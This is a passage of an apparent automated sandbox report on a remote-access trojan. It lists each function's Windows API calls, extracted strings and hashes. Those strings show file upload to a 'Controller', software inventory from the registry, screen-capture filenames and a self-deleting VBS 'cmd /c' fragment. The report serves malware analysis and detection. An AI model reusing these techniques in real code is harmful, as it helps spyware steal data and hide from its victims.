                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                            • API String ID: 1223786279-3931108886
                                                                                                            • Opcode ID: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                            • Opcode Fuzzy Hash: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                            Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                            • API String ID: 2490988753-744132762
                                                                                                            • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                            • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                            • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                            • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                            Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumOpen
                                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                            • API String ID: 1332880857-3714951968
                                                                                                            • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                            • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                            • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                            • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                            Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                            • String ID: Close
                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                            Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$Info
                                                                                                            • String ID:
                                                                                                            • API String ID: 2509303402-0
                                                                                                            • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                            • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                            • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                            • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                            Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                            • Opcode ID: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                            • Opcode Fuzzy Hash: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                            Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                                            • _free.LIBCMT ref: 00450136
                                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                                            • _free.LIBCMT ref: 00450175
                                                                                                            • _free.LIBCMT ref: 00450192
                                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                            Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                            • API String ID: 489098229-65789007
                                                                                                            • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                            • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                            Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                            • API String ID: 1913171305-390638927
                                                                                                            • Opcode ID: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                            • Opcode Fuzzy Hash: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                            Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                            • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                            Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3658366068-0
                                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                            Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                            Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 65535$udp
                                                                                                            • API String ID: 0-1267037602
                                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                            Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                                            • _free.LIBCMT ref: 00439471
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441525078-0
                                                                                                            • Opcode ID: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                            • Opcode Fuzzy Hash: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                            Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                            • API String ID: 2956720200-749203953
                                                                                                            • Opcode ID: 6e6cf4c50a1e278e241bc0e389e802a651f2bd59b645ece987ca2d7b43a5be71
                                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                            • Opcode Fuzzy Hash: 6e6cf4c50a1e278e241bc0e389e802a651f2bd59b645ece987ca2d7b43a5be71
                                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                            Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                            • Opcode ID: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                            • Opcode Fuzzy Hash: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                            Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
